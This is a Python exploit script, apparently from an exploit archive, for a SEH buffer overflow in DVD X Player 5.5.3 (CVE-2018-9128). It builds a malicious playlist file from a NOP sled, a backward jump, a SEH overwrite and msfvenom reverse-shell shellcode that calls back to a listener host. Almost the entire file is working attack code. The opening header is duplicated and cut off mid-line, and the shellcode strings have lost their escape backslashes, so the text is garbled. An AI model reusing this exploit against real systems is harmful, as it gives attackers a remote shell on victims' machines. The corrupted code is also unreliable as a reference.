#!/usr/bin/env python

# Exploit Title: DVD X Player 5.5.3 Buffer Overflow
# Date: 20.03.2019
# Exploit Author: Paolo Perego - paolo@armoredcode.com
# Vendor Homepage: htt #!/usr/bin/env python

# Exploit Title: DVD X Player 5.5.3 Buffer Overflow
# Date: 20.03.2019
# Exploit Author: Paolo Perego - paolo@armoredcode.com
# Vendor Homepage: http://www.dvd-x-player.com
# Software Link: http://www.dvd-x-player.com/download/DVDXPlayerSetup-Standard.exe
# Version: 5.5.3.8 and above
# Tested on: Windows 7 Professional SP1 x86
# CVE : CVE-2018-9128
# Similiar EDB-ID: 44438 https://www.exploit-db.com/exploits/44438
# In Windows 7, SEH handler to be used contains a x00 byte that it has been
# obtained using a restricted char. For such a reason, every jump has to be
# backward on the beginning of attacking shellcode.

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.106 LPORT=4444 -b 'x00x0ax1ax0d' -f py -v shellcode

shellcode = ""
shellcode += "xb8xb8xfaxedxbbxdaxc1xd9x74x24xf4x5a"
shellcode += "x33xc9xb1x52x31x42x12x03x42x12x83x7a"
shellcode += "xfex0fx4ex86x17x4dxb1x76xe8x32x3bx93"
shellcode += "xd9x72x5fxd0x4ax43x2bxb4x66x28x79x2c"
shellcode += "xfcx5cx56x43xb5xebx80x6ax46x47xf0xed"
shellcode += "xc4x9ax25xcdxf5x54x38x0cx31x88xb1x5c"
shellcode += "xeaxc6x64x70x9fx93xb4xfbxd3x32xbdx18"
shellcode += "xa3x35xecx8fxbfx6fx2ex2ex13x04x67x28"
shellcode += "x70x21x31xc3x42xddxc0x05x9bx1ex6ex68"
shellcode += "x13xedx6exadx94x0ex05xc7xe6xb3x1ex1c"
shellcode += "x94x6fxaax86x3exfbx0cx62xbex28xcaxe1"
shellcode += "xccx85x98xadxd0x18x4cxc6xedx91x73x08"
shellcode += "x64xe1x57x8cx2cxb1xf6x95x88x14x06xc5"
shellcode += "x72xc8xa2x8ex9fx1dxdfxcdxf7xd2xd2xed"
shellcode += "x07x7dx64x9ex35x22xdex08x76xabxf8xcf"
shellcode += "x79x86xbdx5fx84x29xbex76x43x7dxeexe0"
shellcode += "x62xfex65xf0x8bx2bx29xa0x23x84x8ax10"
shellcode += "x84x74x63x7ax0bxaax93x85xc1xc3x3ex7c"
shellcode += "x82x2bx16x46x38xc4x65xb6xadx48xe3x50"
shellcode += "xa7x60xa5xcbx50x18xecx87xc1xe5x3axe2"
shellcode += "xc2x6exc9x13x8cx86xa4x07x79x67xf3x75"
shellcode += "x2cx78x29x11xb2xebxb6xe1xbdx17x61xb6"
shellcode += "xeaxe6x78x52x07x50xd3x40xdax04x1cxc0"
shellcode += "x01xf5xa3xc9xc4x41x80xd9x10x49x8cx8d"
shellcode += "xccx1cx5ax7bxabxf6x2cxd5x65xa4xe6xb1"
shellcode += "xf0x86x38xc7xfcxc2xcex27x4cxbbx96x58"
shellcode += "x61x2bx1fx21x9fxcbxe0xf8x1bxf5x11x30"
shellcode += "xb6x62x88xa1xfbxeex2bx1cx3fx17xa8x94"
shellcode += "xc0xecxb0xddxc5xa9x76x0exb4xa2x12x30"
shellcode += "x6bxc2x36"

junk = "x90" * (600 -len(shellcode))
junk += shellcode

# nasm > jmp $-400
# 00000000 E96BFEFFFF jmp 0xfffffe70
backflip="x90x90x90xE9x6BxFExFFxFF"
junk += backflip

# 00401838 |. 5E POP ESI
junk += "xebxf6x90x90"
junk += "x38x18x40x1a"

file = open("evil_playlist.plf", "w")
file.write(junk)
file.close()